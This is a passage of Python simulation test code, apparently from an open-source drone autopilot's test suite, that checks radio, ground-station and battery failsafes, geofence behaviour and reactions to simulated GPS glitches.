self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into RTL and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into Land and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
# Trigger an RC failure in guided mode with the option enabled
# to continue in guided. Verify no failsafe action takes place
self.start_subtest("Radio failsafe with option to continue in guided mode: FS_THR_ENABLE=1 & FS_OPTIONS=4")
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.setGCSfailsafe(1)
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter('FS_OPTIONS', 4)
self.takeoffAndMoveAway()
self.change_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.change_mode("ALT_HOLD")
self.setGCSfailsafe(0)
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe with option to continue in guided mode")
# Trigger an RC failure in AUTO mode with the option enabled
# to continue the mission. Verify no failsafe action takes
# place
self.start_subtest("Radio failsafe RTL with option to continue mission: FS_THR_ENABLE=1 & FS_OPTIONS=1")
self.set_parameter('FS_OPTIONS', 1)
self.progress("# Load copter_mission")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
# self.takeoffAndMoveAway()
self.change_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("AUTO")
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe RTL with option to continue mission")
# Trigger an RC failure in AUTO mode without the option
# enabled to continue. Verify failsafe triggers and RTL
# completes
self.start_subtest("Radio failsafe RTL in mission without "
"option to continue should RTL: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.clear_mission(mavutil.mavlink.MAV_MISSION_TYPE_MISSION)
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL in mission without option to continue")
self.progress("All radio failsafe tests complete")
self.set_parameter('FS_THR_ENABLE', 0)
self.reboot_sitl()
# Tests all actions and logic behind the GCS failsafe
def fly_gcs_failsafe(self, side=60, timeout=360):
try:
self.test_gcs_failsafe(side=side, timeout=timeout)
except Exception as ex:
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.disarm_vehicle(force=True)
self.reboot_sitl()
raise ex
def test_gcs_failsafe(self, side=60, timeout=360):
# Test double-SmartRTL; ensure we do SmarRTL twice rather than
# landing (tests fix for actual bug)
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.context_push()
self.start_subtest("GCS failsafe SmartRTL twice")
self.setGCSfailsafe(3)
self.set_parameter('FS_OPTIONS', 8)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
def ensure_smartrtl(mav, m):
if m.get_type() != "HEARTBEAT":
return
# can't use mode_is here because we're in the message hook
print("Mode: %s" % self.mav.flightmode)
if self.mav.flightmode != "SMART_RTL":
raise NotAchievedException("Not in SMART_RTL")
self.install_message_hook_context(ensure_smartrtl)
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
self.wait_disarmed()
self.end_subtest("GCS failsafe SmartRTL twice")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.context_pop()
# Trigger telemetry loss with failsafe disabled. Verify no action taken.
self.start_subtest("GCS failsafe disabled test: FS_GCS_ENABLE=0 should take no failsafe action")
self.setGCSfailsafe(0)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed GCS failsafe disabled test")
# Trigger telemetry loss with failsafe enabled. Verify
# failsafe triggers to RTL. Restore telemetry, verify failsafe
# clears, and change modes.
self.start_subtest("GCS failsafe recovery test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.change_mode("LOITER")
self.end_subtest("Completed GCS failsafe recovery test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe RTL with no options test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and land completes
self.start_subtest("GCS failsafe LAND with no options test: FS_GCS_ENABLE=5 & FS_OPTIONS=0")
self.setGCSfailsafe(5)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe land with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->RTL with no options test: FS_GCS_ENABLE=3 & FS_OPTIONS=0")
self.setGCSfailsafe(3)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->Land with no options test: FS_GCS_ENABLE=4 & FS_OPTIONS=0")
self.setGCSfailsafe(4)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->Land with no options test")
# Trigger telemetry loss with an invalid failsafe value. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe invalid value with no options test: FS_GCS_ENABLE=99 & FS_OPTIONS=0")
self.setGCSfailsafe(99)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe invalid value with no options test")
# Trigger telemetry loss with failsafe enabled to test FS_OPTIONS settings
self.start_subtest("GCS failsafe with option bit tests: FS_GCS_ENABLE=1 & FS_OPTIONS=64/2/16")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 16)
self.takeoffAndMoveAway()
self.progress("Testing continue in pilot controlled modes")
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Pilot Control", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue in auto mission")
self.set_parameter('FS_OPTIONS', 2)
self.change_mode("AUTO")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Auto Mode", timeout=60)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue landing in land mode")
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Landing", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe with option bits")
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.progress("All GCS failsafe tests complete")
self.reboot_sitl()
# Tests all actions and logic behind the battery failsafe
def fly_battery_failsafe(self, timeout=300):
ex = None
try:
self.test_battery_failsafe(timeout=timeout)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_parameter('BATT_LOW_VOLT', 0)
self.set_parameter('BATT_CRT_VOLT', 0)
self.set_parameter('BATT_FS_LOW_ACT', 0)
self.set_parameter('BATT_FS_CRT_ACT', 0)
self.set_parameter('FS_OPTIONS', 0)
self.reboot_sitl()
if ex is not None:
raise ex
def test_battery_failsafe(self, timeout=300):
self.progress("Configure battery failsafe parameters")
self.set_parameters({
'SIM_SPEEDUP': 4,
'BATT_LOW_VOLT': 11.5,
'BATT_CRT_VOLT': 10.1,
'BATT_FS_LOW_ACT': 0,
'BATT_FS_CRT_ACT': 0,
'FS_OPTIONS': 0,
'SIM_BATT_VOLTAGE': 12.5,
})
# Trigger low battery condition with failsafe disabled. Verify
# no action taken.
self.start_subtest("Batt failsafe disabled test")
self.takeoffAndMoveAway()
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.change_mode("RTL")
self.wait_rtl_complete()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed Batt failsafe disabled test")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify RTL and Land actions
# complete.
self.start_subtest("Two stage battery failsafe test with RTL and Land")
self.takeoffAndMoveAway()
self.delay_sim_time(3)
self.set_parameter('BATT_FS_LOW_ACT', 2)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("RTL")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with RTL and Land")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify both SmartRTL
# actions complete
self.start_subtest("Two stage battery failsafe test with SmartRTL")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 3)
self.set_parameter('BATT_FS_CRT_ACT', 4)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.change_mode("LOITER")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with SmartRTL")
# Trigger low battery condition in land mode with FS_OPTIONS
# set to allow land mode to continue. Verify landing completes
# uninterrupted.
self.start_subtest("Battery failsafe with FS_OPTIONS set to continue landing")
self.takeoffAndMoveAway()
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe with FS_OPTIONS set to continue landing")
# Trigger a critical battery condition, which triggers a land
# mode failsafe. Trigger an RC failure. Verify the RC failsafe
# is prevented from stopping the low battery landing.
self.start_subtest("Battery failsafe critical landing")
self.takeoffAndMoveAway(100, 50)
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter('BATT_FS_LOW_ACT', 1)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('FS_THR_ENABLE', 1)
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.wait_mode("LAND")
self.delay_sim_time(10)
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(10)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.set_parameter("SIM_RC_FAIL", 0)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe critical landing")
# Trigger low battery condition with failsafe set to terminate. Copter will disarm and crash.
self.start_subtest("Battery failsafe terminate")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 5)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.wait_disarmed()
self.end_subtest("Completed terminate failsafe test")
self.progress("All Battery failsafe tests complete")
# fly_stability_patch - fly south, then hold loiter within 5m
# position and altitude and reduce 1 motor to 60% efficiency
def fly_stability_patch(self,
holdtime=30,
maxaltchange=5,
maxdistchange=10):
self.takeoff(10, mode="LOITER")
# first south
self.progress("turn south")
self.set_rc(4, 1580)
self.wait_heading(180)
self.set_rc(4, 1500)
# fly west 80m
self.set_rc(2, 1100)
self.wait_distance(80)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
# cut motor 1's to efficiency
self.progress("Cutting motor 1 to 65% efficiency")
self.set_parameter("SIM_ENGINE_MUL", 0.65)
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
("Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange)))
# restore motor 1 to 100% efficiency
self.set_parameter("SIM_ENGINE_MUL", 1.0)
self.progress("Stability patch and Loiter OK for %us" % holdtime)
self.progress("RTL after stab patch")
self.do_RTL()
def debug_arming_issue(self):
while True:
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() in ["STATUSTEXT", "COMMAND_ACK"]:
print("Got: %s" % str(m))
if self.mav.motors_armed():
self.progress("Armed")
return
# fly_fence_test - fly east until you hit the horizontal circular fence
avoid_behave_slide = 0
def fly_fence_avoid_test_radius_check(self, timeout=180, avoid_behave=avoid_behave_slide):
using_mode = "LOITER" # must be something which adjusts velocity!
self.change_mode(using_mode)
self.set_parameter("FENCE_ENABLE", 1) # fence
self.set_parameter("FENCE_TYPE", 2) # circle
fence_radius = 15
self.set_parameter("FENCE_RADIUS", fence_radius)
fence_margin = 3
self.set_parameter("FENCE_MARGIN", fence_margin)
self.set_parameter("AVOID_ENABLE", 1)
self.set_parameter("AVOID_BEHAVE", avoid_behave)
self.set_parameter("RC10_OPTION", 40) # avoid-enable
self.wait_ready_to_arm()
self.set_rc(10, 2000)
home_distance = self.distance_to_home(use_cached_home=True)
if home_distance > 5:
raise PreconditionFailedException("Expected to be within 5m of home")
self.zero_throttle()
self.arm_vehicle()
self.set_rc(3, 1700)
self.wait_altitude(10, 100, relative=True)
self.set_rc(3, 1500)
self.set_rc(2, 1400)
self.wait_distance_to_home(12, 20)
tstart = self.get_sim_time()
push_time = 70 # push against barrier for 60 seconds
failed_max = False
failed_min = False
while True:
if self.get_sim_time() - tstart > push_time:
self.progress("Push time up")
break
# make sure we don't RTL:
if not self.mode_is(using_mode):
raise NotAchievedException("Changed mode away from %s" % using_mode)
distance = self.distance_to_home(use_cached_home=True)
inner_radius = fence_radius - fence_margin
want_min = inner_radius - 1 # allow 1m either way
want_max = inner_radius + 1 # allow 1m either way
self.progress("Push: distance=%f %f<want<%f" %
(distance, want_min, want_max))
if distance < want_min:
if failed_min is False:
self.progress("Failed min")
failed_min = True
if distance > want_max:
if failed_max is False:
self.progress("Failed max")
failed_max = True
if failed_min and failed_max:
raise NotAchievedException("Failed both min and max checks. Clever")
if failed_min:
raise NotAchievedException("Failed min")
if failed_max:
raise NotAchievedException("Failed max")
self.set_rc(2, 1500)
self.do_RTL()
def fly_fence_avoid_test(self, timeout=180):
self.fly_fence_avoid_test_radius_check(avoid_behave=1, timeout=timeout)
self.fly_fence_avoid_test_radius_check(avoid_behave=0, timeout=timeout)
def assert_prearm_failure(self, expected_statustext, timeout=5, ignore_prearm_failures=[]):
seen_statustext = False
seen_command_ack = False
self.drain_mav()
tstart = self.get_sim_time_cached()
arm_last_send = 0
while True:
if seen_command_ack and seen_statustext:
break
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException(
"Did not see failure-to-arm messages (statustext=%s command_ack=%s" %
(seen_statustext, seen_command_ack))
if now - arm_last_send > 1:
arm_last_send = now
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() == "STATUSTEXT":
if expected_statustext in m.text:
self.progress("Got: %s" % str(m))
seen_statustext = True
elif "PreArm" in m.text and m.text[8:] not in ignore_prearm_failures:
self.progress("Got: %s" % str(m))
raise NotAchievedException("Unexpected prearm failure (%s)" % m.text)
if m.get_type() == "COMMAND_ACK":
print("Got: %s" % str(m))
if m.command == mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM:
if m.result != 4:
raise NotAchievedException("command-ack says we didn't fail to arm")
self.progress("Got: %s" % str(m))
seen_command_ack = True
if self.mav.motors_armed():
raise NotAchievedException("Armed when we shouldn't have")
# fly_fence_test - fly east until you hit the horizontal circular fence
def fly_fence_test(self, timeout=180):
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
# fence requires home to be set:
m = self.poll_home_position()
if m is None:
raise NotAchievedException("Did not receive HOME_POSITION")
self.progress("home: %s" % str(m))
self.start_subtest("ensure we can't arm if outside fence")
self.load_fence("fence-in-middle-of-nowhere.txt")
self.delay_sim_time(5) # let fence check run so it loads-from-eeprom
self.assert_prearm_failure("vehicle outside fence")
self.progress("Failed to arm outside fence (good!)")
self.clear_fence()
self.delay_sim_time(5) # let fence breach clear
self.drain_mav()
self.end_subtest("ensure we can't arm if outside fence")
self.start_subtest("ensure we can't arm with bad radius")
self.context_push()
self.set_parameter("FENCE_RADIUS", -1)
self.assert_prearm_failure("Invalid FENCE_RADIUS value")
self.context_pop()
self.progress("Failed to arm with bad radius")
self.drain_mav()
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("ensure we can't arm with bad alt")
self.context_push()
self.set_parameter("FENCE_ALT_MAX", -1)
self.assert_prearm_failure("Invalid FENCE_ALT_MAX value")
self.context_pop()
self.progress("Failed to arm with bad altitude")
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("Check breach-fence behaviour")
self.set_parameter("FENCE_TYPE", 2)
self.takeoff(10, mode="LOITER")
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
fence_radius = self.get_parameter("FENCE_RADIUS")
self.progress("flying forward (east) until we hit fence")
pitching_forward = True
self.set_rc(2, 1100)
self.progress("Waiting for fence breach")
tstart = self.get_sim_time()
while not self.mode_is("RTL"):
if self.get_sim_time_cached() - tstart > 30:
raise NotAchievedException("Did not breach fence")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f (fence radius=%f)" %
(alt, home_distance, fence_radius))
self.progress("Waiting until we get home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f" %
(alt, home_distance))
# recenter pitch sticks once we're home so we don't fly off again
if pitching_forward and home_distance < 50:
pitching_forward = False
self.set_rc(2, 1475)
# disable fence
self.set_parameter("FENCE_ENABLE", 0)
if (alt <= 1 and home_distance < 10) or (not self.armed() and home_distance < 10):
# reduce throttle
self.zero_throttle()
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.progress("Reached home OK")
self.zero_throttle()
return
# give we're testing RTL, doing one here probably doesn't make sense
home_distance = self.distance_to_home(use_cached_home=True)
raise AutoTestTimeoutException(
"Fence test failed to reach home (%fm distance) - "
"timed out after %u seconds" % (home_distance, timeout,))
# fly_alt_max_fence_test - fly up until you hit the fence ceiling
def fly_alt_max_fence_test(self):
self.takeoff(10, mode="LOITER")
"""Hold loiter position."""
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 1)
self.change_alt(10)
# first east
self.progress("turning east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
self.progress("flying east 20m")
self.set_rc(2, 1100)
self.wait_distance(20)
self.progress("flying up")
self.set_rc_from_map({
2: 1500,
3: 1800,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
self.zero_throttle()
# fly_alt_min_fence_test - fly down until you hit the fence floor
def fly_alt_min_fence_test(self):
self.takeoff(30, mode="LOITER", timeout=60)
# enable fence, disable avoidance
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 8)
self.set_parameter("FENCE_ALT_MIN", 20)
self.change_alt(30)
# Activate the floor fence
# TODO this test should run without requiring this
self.do_fence_enable()
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
# fly forward (east) at least 20m
self.set_rc(2, 1100)
self.wait_distance(20)
# stop flying forward and start flying down:
self.set_rc_from_map({
2: 1500,
3: 1200,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.zero_throttle()
def fly_fence_floor_enabled_landing(self):
""" fly_fence_floor_enabled_landing. Ensures we can initiate and complete
an RTL while the fence is enabled. """
fence_bit = mavutil.mavlink.MAV_SYS_STATUS_GEOFENCE
self.progress("Test Landing while fence floor enabled")
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 15)
self.set_parameter("FENCE_ALT_MIN", 10)
self.set_parameter("FENCE_ALT_MAX", 20)
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=15)
# Check fence is enabled
self.do_fence_enable()
self.assert_fence_enabled()
# Change to RC controlled mode
self.change_mode('LOITER')
self.set_rc(3, 1800)
self.wait_mode('RTL', timeout=120)
self.wait_landed_and_disarmed()
self.assert_fence_enabled()
# Assert fence is not healthy
self.assert_sensor_state(fence_bit, healthy=False)
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.assert_fence_disabled()
def fly_gps_glitch_loiter_test(self, timeout=30, max_distance=20):
"""fly_gps_glitch_loiter_test. Fly south east in loiter and test
reaction to gps glitch."""
self.takeoff(10, mode="LOITER")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(1, glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# turn south east
self.progress("turn south east")
self.set_rc(4, 1580)
try:
self.wait_heading(150)
self.set_rc(4, 1500)
# fly forward (south east) at least 60m
self.set_rc(2, 1100)
self.wait_distance(60)
self.set_rc(2, 1500)
# wait for copter to slow down
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
tnow = tstart
start_pos = self.sim_location()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while tnow < tstart + timeout:
tnow = self.get_sim_time_cached()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# turn off glitching if we've reached the end of glitch list
if glitch_current >= glitch_num:
glitch_current = -1
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
else:
self.progress("Applying glitch %u" % glitch_current)
# move onto the next glitch
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# start displaying distance moved after all glitches applied
if glitch_current == -1:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
alt = m.alt/1000.0 # mm -> m
curr_pos = self.sim_location()
moved_distance = self.get_distance(curr_pos, start_pos)
self.progress("Alt: %.02f Moved: %.0f" %
(alt, moved_distance))
if moved_distance > max_distance:
raise NotAchievedException(
"Moved over %u meters, Failed!" % max_distance)
else:
self.drain_mav()
# disable gps glitch
if glitch_current != -1:
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS glitch test passed!"
" stayed within %u meters for %u seconds" %
(max_distance, timeout))
self.do_RTL()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_gps_glitch_auto_test - fly mission and test reaction to gps glitch
def fly_gps_glitch_auto_test(self, timeout=180):
# set-up gps glitch array
glitch_lat = [0.0002996,
